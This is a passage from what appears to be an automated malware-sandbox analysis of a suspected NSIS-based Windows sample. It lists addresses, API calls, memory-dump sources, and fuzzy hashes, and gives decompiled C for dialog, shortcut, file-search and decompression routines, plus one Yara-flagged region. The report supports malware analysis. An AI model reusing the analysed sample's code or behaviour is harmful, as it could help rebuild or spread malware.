                                                                                                                                                                          0x00404c5c
                                                                                                                                                                          0x00404c64
                                                                                                                                                                          0x00404c7f
                                                                                                                                                                          0x00404c66
                                                                                                                                                                          0x00404c6f
                                                                                                                                                                          0x00404c6f
                                                                                                                                                                          0x00404c64
                                                                                                                                                                          0x00404c84
                                                                                                                                                                          0x00404c89
                                                                                                                                                                          0x00404c8e
                                                                                                                                                                          0x00404c97
                                                                                                                                                                          0x00404c97
                                                                                                                                                                          0x00404ca0
                                                                                                                                                                          0x00404ca2
                                                                                                                                                                          0x00404ca2
                                                                                                                                                                          0x00404cae
                                                                                                                                                                          0x00404cb6
                                                                                                                                                                          0x00404cc0
                                                                                                                                                                          0x00404cc0
                                                                                                                                                                          0x00404cc5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404cc5
                                                                                                                                                                          0x00404b6f
                                                                                                                                                                          0x00404b26
                                                                                                                                                                          0x00404b2d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404b2d
                                                                                                                                                                          0x00404a4c
                                                                                                                                                                          0x00404a55
                                                                                                                                                                          0x00404a6f
                                                                                                                                                                          0x00404a74
                                                                                                                                                                          0x00404a7e
                                                                                                                                                                          0x00404a85
                                                                                                                                                                          0x00404a91
                                                                                                                                                                          0x00404a94
                                                                                                                                                                          0x00404a97
                                                                                                                                                                          0x00404a9e
                                                                                                                                                                          0x00404aa6
                                                                                                                                                                          0x00404aa9
                                                                                                                                                                          0x00404aad
                                                                                                                                                                          0x00404ab4
                                                                                                                                                                          0x00404abc
                                                                                                                                                                          0x00404b16
                                                                                                                                                                          0x00404abe
                                                                                                                                                                          0x00404abf
                                                                                                                                                                          0x00404ac6
                                                                                                                                                                          0x00404ad0
                                                                                                                                                                          0x00404ad8
                                                                                                                                                                          0x00404ae5
                                                                                                                                                                          0x00404af9
                                                                                                                                                                          0x00404afd
                                                                                                                                                                          0x00404afd
                                                                                                                                                                          0x00404af9
                                                                                                                                                                          0x00404b02
                                                                                                                                                                          0x00404b0f
                                                                                                                                                                          0x00404b0f
                                                                                                                                                                          0x00404abc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404a74
                                                                                                                                                                          0x00404a62
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404a68
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004049d3
                                                                                                                                                                          0x004049e0
                                                                                                                                                                          0x004049e9
                                                                                                                                                                          0x004049f6
                                                                                                                                                                          0x004049f6
                                                                                                                                                                          0x004049fd
                                                                                                                                                                          0x00404a03
                                                                                                                                                                          0x00404a0c
                                                                                                                                                                          0x00404a0f
                                                                                                                                                                          0x00404a12
                                                                                                                                                                          0x00404a1a
                                                                                                                                                                          0x00404a1d
                                                                                                                                                                          0x00404a20
                                                                                                                                                                          0x00404a26
                                                                                                                                                                          0x00404a2d
                                                                                                                                                                          0x00404a34
                                                                                                                                                                          0x00404ccb
                                                                                                                                                                          0x00404cdd
                                                                                                                                                                          0x00404a3a
                                                                                                                                                                          0x00404a3d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404a3d
                                                                                                                                                                          0x00404a34

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32 ref: 004049D9
                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                                                                                                                          • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
                                                                                                                                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404AFD
                                                                                                                                                                          • SetDlgItemTextW.USER32 ref: 00404B0F
                                                                                                                                                                            • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                                                                                                                                            • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74E5FAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                                                                            • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                                                                            • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,74E5FAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                                                                            • Part of subcall function 004067C4: CharPrevW.USER32(?,?,74E5FAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                                                                                                                                            • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                                                                            • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                                                                                                                            • Part of subcall function 00404D46: SetDlgItemTextW.USER32 ref: 00404E03
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                          • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                                                                                                          • API String ID: 2624150263-2678639445
                                                                                                                                                                          • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                                                                                                          • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                                                                                                                          • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                                                                                                          • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004021AA, Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                          			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x441000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                                                                                                                                          0x004021b3
                                                                                                                                                                          0x004021bd
                                                                                                                                                                          0x004021c7
                                                                                                                                                                          0x004021d1
                                                                                                                                                                          0x004021dc
                                                                                                                                                                          0x004021df
                                                                                                                                                                          0x004021f9
                                                                                                                                                                          0x004021fc
                                                                                                                                                                          0x00402202
                                                                                                                                                                          0x00402205
                                                                                                                                                                          0x0040220f
                                                                                                                                                                          0x00402213
                                                                                                                                                                          0x00402213
                                                                                                                                                                          0x00402218
                                                                                                                                                                          0x00402229
                                                                                                                                                                          0x00402231
                                                                                                                                                                          0x004022e8
                                                                                                                                                                          0x004022e8
                                                                                                                                                                          0x004022ef
                                                                                                                                                                          0x00402237
                                                                                                                                                                          0x00402237
                                                                                                                                                                          0x00402246
                                                                                                                                                                          0x0040224a
                                                                                                                                                                          0x0040224d
                                                                                                                                                                          0x00402253
                                                                                                                                                                          0x00402261
                                                                                                                                                                          0x00402264
                                                                                                                                                                          0x00402266
                                                                                                                                                                          0x00402271
                                                                                                                                                                          0x00402271
                                                                                                                                                                          0x00402276
                                                                                                                                                                          0x00402278
                                                                                                                                                                          0x0040227f
                                                                                                                                                                          0x0040227f
                                                                                                                                                                          0x00402282
                                                                                                                                                                          0x0040228b
                                                                                                                                                                          0x0040228e
                                                                                                                                                                          0x00402294
                                                                                                                                                                          0x00402296
                                                                                                                                                                          0x004022a0
                                                                                                                                                                          0x004022a0
                                                                                                                                                                          0x004022a3
                                                                                                                                                                          0x004022ac
                                                                                                                                                                          0x004022af
                                                                                                                                                                          0x004022b8
                                                                                                                                                                          0x004022be
                                                                                                                                                                          0x004022c0
                                                                                                                                                                          0x004022ce
                                                                                                                                                                          0x004022ce
                                                                                                                                                                          0x004022d1
                                                                                                                                                                          0x004022d7
                                                                                                                                                                          0x004022d7
                                                                                                                                                                          0x004022da
                                                                                                                                                                          0x004022e0
                                                                                                                                                                          0x004022e6
                                                                                                                                                                          0x004022fb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004022e6
                                                                                                                                                                          0x004022f1
                                                                                                                                                                          0x00402c2d
                                                                                                                                                                          0x00402c39

                                                                                                                                                                          APIs
                                                                                                                                                                          • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 542301482-0
                                                                                                                                                                          • Opcode ID: 58fea544f8465b7ca695cd277db4a94267474b575ac50a9b019070cedb53bd32
                                                                                                                                                                          • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                                                                                                                                          • Opcode Fuzzy Hash: 58fea544f8465b7ca695cd277db4a94267474b575ac50a9b019070cedb53bd32
                                                                                                                                                                          • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040290B, Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 39%
                                                                                                                                                                          			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040653D();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                                                                                                                                          0x00402923
                                                                                                                                                                          0x0040293e
                                                                                                                                                                          0x00402949
                                                                                                                                                                          0x0040294a
                                                                                                                                                                          0x00402a94
                                                                                                                                                                          0x00402925
                                                                                                                                                                          0x00402928
                                                                                                                                                                          0x0040292b
                                                                                                                                                                          0x0040292e
                                                                                                                                                                          0x0040292e
                                                                                                                                                                          0x00402c2d
                                                                                                                                                                          0x00402c39

                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                          • Opcode ID: e3c555fdbd57f1008fac0fd93a6eb0fb110785489bc5405dabc14b2674c5a242
                                                                                                                                                                          • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                                                                                                                                          • Opcode Fuzzy Hash: e3c555fdbd57f1008fac0fd93a6eb0fb110785489bc5405dabc14b2674c5a242
                                                                                                                                                                          • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02949414, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: ^f
                                                                                                                                                                          • API String ID: 0-3241190984
                                                                                                                                                                          • Opcode ID: 6ca599f050ed5b26354e8932f09c90aec4055191938ca164988a990eaf0e751d
                                                                                                                                                                          • Instruction ID: 52686d7cd01578973064e83ff8da2de1e670195ab35baa8204f4e78c73a3fca5
                                                                                                                                                                          • Opcode Fuzzy Hash: 6ca599f050ed5b26354e8932f09c90aec4055191938ca164988a990eaf0e751d
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C21D33520835A8BDF34CF28C9E57EB37A2AF5A744F89412CCC8D8B202E731944AC746
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00406D85, Relevance: .3, Instructions: 334COMMONCrypto
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                          			E00406D85(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004074F4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4084d4; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4084d4; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
